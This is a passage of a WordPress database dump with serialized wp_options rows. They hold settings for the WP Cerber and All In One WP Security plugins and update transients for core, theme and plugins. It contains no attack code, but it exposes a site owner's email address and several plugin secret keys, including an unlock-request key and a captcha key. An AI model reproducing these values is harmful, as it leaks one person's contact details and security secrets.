(\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624622942.790106;}}','no'),(89908,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1624622945;}','no'),(89909,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span> <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p> <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n </td></tr></table>\r\n \r\n <p><a href=\"https://www.trustpilot.com/review/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n | \r\n <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" Awesome! \"/></p>','no'),(89910,'cerber-groove','6eUdjACKbk0QFOTJ','no'),(89911,'cerber-groove-x','a:2:{i:0;s:29:\"yU5h1FfoinCPb0KktszXu4Sg6NImD\";i:1;s:28:\"nv5BElc3j4yVk0WfXQ8C7xh1wHIT\";}','no'),(89912,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";i:1;s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";i:1;s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";i:1;s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(89913,'cerber-hardening','a:14:{s:8:\"stopenum\";i:1;s:15:\"stopenum_oembed\";i:1;s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";i:1;s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";i:1;s:6:\"norest\";i:0;s:8:\"restauth\";i:1;s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";i:1;}','no'),(89914,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";i:1;s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(89915,'cerber-antispam','a:10:{s:8:\"botscomm\";i:1;s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";i:1;s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(89916,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(89917,'cerber-notifications','a:11:{s:6:\"notify\";i:1;s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(89918,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";i:1;s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(89919,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(89920,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(89921,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(89922,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(89923,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(89924,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";i:1;s:13:\"master_swshow\";i:1;s:14:\"master_at_site\";i:1;s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(89925,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(89928,'aiowpsec_db_version','1.9','yes'),(89929,'aio_wp_security_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"tmpylq2ne515s92e2xil\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"925eaqt0w8wftnj8yqgx\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(89954,'https_detection_errors','a:0:{}','yes'),(89964,'recovery_mode_email_last_sent','1624955800','yes'),(97420,'_transient_wfsn_backoff','1','no'),(103765,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103771,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675208580;s:7:\"checked\";a:1:{s:13:\"healing-touch\";s:3:\"1.7\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:1:{s:13:\"healing-touch\";a:6:{s:5:\"theme\";s:13:\"healing-touch\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:43:\"https://wordpress.org/themes/healing-touch/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/healing-touch.1.7.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}}s:12:\"translations\";a:0:{}}','no'),(125541,'wp_force_deactivated_plugins','a:0:{}','yes'),(125554,'_transient_is_multi_author','0','yes'),(125584,'_transient_all_the_cool_cats','3','yes'),(127685,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:5:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.9.5\";s:7:\"version\";s:5:\"5.9.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1675208579;s:15:\"version_checked\";s:5:\"5.8.6\";s:12:\"translations\";a:0:{}}','no'),(132441,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675436634','no'),(132442,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(132706,'_site_transient_timeout_theme_roots','1675210380','no'),(132707,'_site_transient_theme_roots','a:1:{s:13:\"healing-touch\";s:7:\"/themes\";}','no'),(132708,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675208580;s:8:\"response\";a:9:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.0.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.0.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.2\";}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.70\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.70.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2837281\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2837281\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.3\";}s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"5.1.4\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.5.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-256x256.png?rev=2798307\";s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=2798307\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=2798307\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=2798307\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:39:\"disable-gutenberg/disable-gutenberg.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/disable-gutenberg\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:6:\"plugin\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:11:\"new_version\";s:5:\"2.8.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/disable-gutenberg/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/disable-gutenberg.2.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-256x256.png?rev=1925990\";s:2:\"1x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-128x128.png?rev=1925990\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:6:\"5.6.20\";}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.10.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.10.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=2622511\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=2597493\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=2597493\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"7.0\";}s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:36:\"w.org/plugins/zotya-htaccess-protect\";s:4:\"slug\";s:22:\"zotya-htaccess-protect\";s:6:\"plugin\";s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";s:11:\"new_version\";s:5:\"0.7.0\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/zotya-htaccess-protect/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/zotya-htaccess-protect.0.7.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/zotya-htaccess-protect/assets/icon-256x256.png?rev=2314302\";s:2:\"1x\";s:75:\"https://ps.w.org/zotya-htaccess-protect/assets/icon-128x128.png?rev=2314302\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/zotya-htaccess-protect/assets/banner-1544x500.png?rev=2314302\";s:2:\"1x\";s:77:\"https://ps.w.org/zotya-htaccess-protect/assets/banner-772x250.png?rev=2314302\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"5.9.5\";s:12:\"requires_php\";s:3:\"5.6\";}s:27:\"redirection/redirection.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/redirection\";s:4:\"slug\";s:11:\"redirection\";s:6:\"plugin\";s:27:\"redirection/redirection.php\";s:11:\"new_version\";s:5:\"5.3.9\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/redirection/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/redirection.5.3.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/redirection/assets/icon-256x256.jpg?rev=983639\";s:2:\"